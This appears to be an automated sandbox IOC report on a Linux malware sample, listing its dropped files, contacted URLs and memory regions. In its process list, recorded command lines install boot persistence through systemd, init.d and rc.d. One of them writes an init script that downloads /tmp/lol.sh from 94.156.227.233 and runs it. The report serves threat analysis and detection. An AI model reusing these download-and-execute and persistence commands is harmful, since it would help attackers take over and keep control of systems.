IOC Report
m68k.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
m68k.nn.elf
ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/m68k.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.Fr6rHn (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/m68k.nn.elf
/tmp/m68k.nn.elf
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/m68k.nn.elf
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 23 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/curl.sh
unknown
http://94.156.227.233/lol.sh
unknown
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.24

Memdumps

Base Address
Regiontype
Protect
Malicious
7fbf0c01c000
page execute read
 malicious
7fbf0c01f000
page read and write
7fbf8c021000
page read and write
7ffe5a700000
page execute read
7fbf91929000
page read and write
7fbf92c2c000
page read and write
562b7ba81000
page execute and read and write
7ffe5a632000
page read and write
562b7cfb5000
page read and write
7fbf9213a000
page read and write
7fbf92afb000
page read and write
7fbf9212c000
page read and write
7fbf8c000000
page read and write
7fbf9278b000
page read and write
7fbf927b0000
page read and write
562b79849000
page execute read
7fbf0c024000
page read and write
7fbf92c24000
page read and write
562b7bb18000
page read and write
562b79a7b000
page read and write
7fbf923c9000
page read and write
562b79a83000
page read and write
7fbf92c71000
page read and write
There are 13 hidden memdumps, click here to show them.